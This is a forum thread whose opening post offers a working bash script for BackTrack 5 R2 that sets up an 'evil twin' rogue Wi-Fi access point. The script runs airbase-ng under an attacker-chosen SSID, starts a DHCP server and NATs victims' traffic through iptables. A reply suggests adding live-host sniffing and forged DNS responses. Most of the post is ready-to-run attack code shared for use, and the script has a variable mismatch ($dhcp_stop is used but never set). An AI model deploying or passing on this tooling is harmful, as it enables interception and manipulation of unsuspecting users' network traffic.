[BASH] create an evil twin or fake access point

[RedBullAddicted]

Hi folks,

I just created a little bash script for backtrack 5 R2 to create a evil twin or fake access point.
For those who don't know what this is try this link: http://en.wikipedia.org/wiki/Evil_twin_%28wireless_networks%29

I started with this tutorial and made many improvements: http://exploit.co.il/hacking/set-fake-access-point-backtrack5/

As I'm not an advanced bash scripter I hope somebody can make this a bit better than I can. Fell free to edit what you like 

For now this is a working script which I tested on backtrack 5 R2
You need to install dhcp3-server before you start

Code: [Select]

apt-get install dhcp3-server
Have fun with it

Code: [Select]

#!/bin/bash

##########################################
# create an evil twin access point       #
#                                        #
# written by: 8xsde9ed                   #
# tested on backtrack 5 R2               #
##########################################

#Killing active processes
echo "Killing airbase-ng"
pkill airbase-ng
sleep 2;
echo "Killing dhcpd"
pkill dhcpd3
sleep 2;

#Getting required informations
echo -n "Enter your wlan interface and press [ENTER] (e.g. wlan0): "
read wlan_int
echo -n "Enter the subnet for your DHCP scope and press [ENTER] (e.g. 10.10.0.0): "
read dhcp_subnet
echo -n "Enter the subnetmask for your DHCP scope and press [ENTER] (e.g. 255.255.255.0): "
read dhcp_subnetmask
echo -n "Enter the broadcast address for your dhcp scope and press [ENTER] (e.g. 10.10.0.255): "
read dhcp_broadcast
echo -n "Enter the default gateway for your DHCP Scope and press [ENTER] (e.g. 10.10.0.10): "
read dhcp_dgw
echo -n "Enter the DNS Server for your DHCP Scope and press [ENTER] (e.g. 10.10.0.20): "
read dhcp_dns
echo -n "Enter the start address of your DHCP scope and press [ENTER] (e.g. 10.10.0.100): "
read dhcp_start
echo -n "Enter the last address of your DHCP scope and press [ENTER] (e.g. 10.10.0.150): "
read dhcp_last
echo -n "Enter the SSID you like to use for your Access Point and press [ENTER] (e.g. eviltwin): "
read ssid
echo -n "Enter the Channel you like to use for your Access Point and press [ENTER] (e.g. 11): "
read channel
echo -n "Enter the interface name which is connected to the internet and press [ENTER] (e.g. eth0): "
read inet_int

#If you want to you can put some user input validation here ...

#Setting dhcpd config to /etc/dhcp3/dhcpd.conf
echo "setting dhcpd config in /etc/dhcp3/dhcpd.conf"
sleep 2;
#check if there allready is a backup directory for the original dhcpd.conf file

DIR="/etc/dhcp3/orig_conf"

if [ -d "$DIR" ]; then
    echo "You allready have a backup directory for the original dhcpd.conf"
    sleep 2;
else
    echo "You do not have a backup directory for the original dhcpd.conf file... I create one"
    sleep 2;
    mkdir /etc/dhcp3/orig_conf
fi

#check if there allready is a backup of the original dhcpd.conf file. If not one will be created
if [ "$(ls -A $DIR)" ]; then
     echo "You allready have a backup of the original konfiguration file in /etc/dhcp3/orig_conf"
     sleep 2;
else
    echo "creating backup of original dhcpd config file to /etc/dhcp3/orig_conf"
    sleep 2;
    cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/orig_conf/dhcpd.conf
    rm /etc/dhcp3/dhcpd.conf
fi

echo "ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
authoritative;
subnet $dhcp_subnet netmask $dhcp_subnetmask {
option subnet-mask $dhcp_subnetmask;
option broadcast-address $dhcp_broadcast;
option routers $dhcp_dgw;
option domain-name-servers $dhcp_dns;
range $dhcp_start $dhcp_stop; }" > /etc/dhcp3/dhcpd.conf

#Starting monitor mode on $wlan_int
echo "putting $wlan_int into monitor mode. You can check that later by using iwconfig command"
sleep 2;
airmon-ng stop $wlan_int
sleep 5;
airmon-ng start $wlan_int
sleep 5;

#Starting airbase-ng with SSID=$ssid and channel=$channel
echo "starting airbase-ng with SSID $ssid and channel $channel"
sleep 2;
airbase-ng -e $ssid -c $channel -v $wlan_int &
sleep 5;

#starting new generated interface at0 and assign ip address
echo "starting at0 with ip $dhcp_dgw and subnetmask $dhcp_subnet and create a route for that"
sleep 2;
ifconfig at0 down
sleep 2;
ifconfig at0 $dhcp_dgw netmask $dhcp_subnetmask
sleep 2;
ifconfig at0 up
sleep 2;
route add -net $dhcp_subnet netmask $dhcp_subnetmask gw $dhcp_dgw
sleep 2;

#Setup iptables with nat for the new network
echo "setting up iptables with nat for the new network"
sleep 2;
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $inet_int -j MASQUERADE

#Clear DHCP leases
echo "clearing dhcp leases"
sleep 2;
echo > '/var/lib/dhcp3/dhcpd.leases'

#creating a symlink to dhcpd.pid
ln -s /var/run/dhcp3-server/dhcp.pid /var/run/dhcpd.pid

#start dhcp server and enable ip forwarding
echo "starting dhcp and enabling ip forwarding"
sleep 2;
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
echo "1" > /proc/sys/net/ipv4/ip_forward

[frog]

I like the script; it clearly defines what needs to be done to accomplish such a task. If I were you I would adopt the techniques into another script with a higher, more automated purpose, starting from the ground up. Perhaps incorporating the setup of a fake access point(which you have already done) into a program that monitors the LAN for live hosts using ARP requests or looking for/sniffing DHCP requests? Maybe a little DNS request catching/response forging? This should be in key with what you are trying to accomplish.

[RedBullAddicted]

Hi frog,

thanks for your reply. I'am very new to programming. This is the reason why I registered to this forum  Your Idea sounds great but I don't think I'am able to do such a program/script at the moment. But I keep on learning.

Cheers,
8xsde9ed

[frog]

I like your attitude; keep on going. That's what it's all about; progress, practice, research, and doing what you enjoy.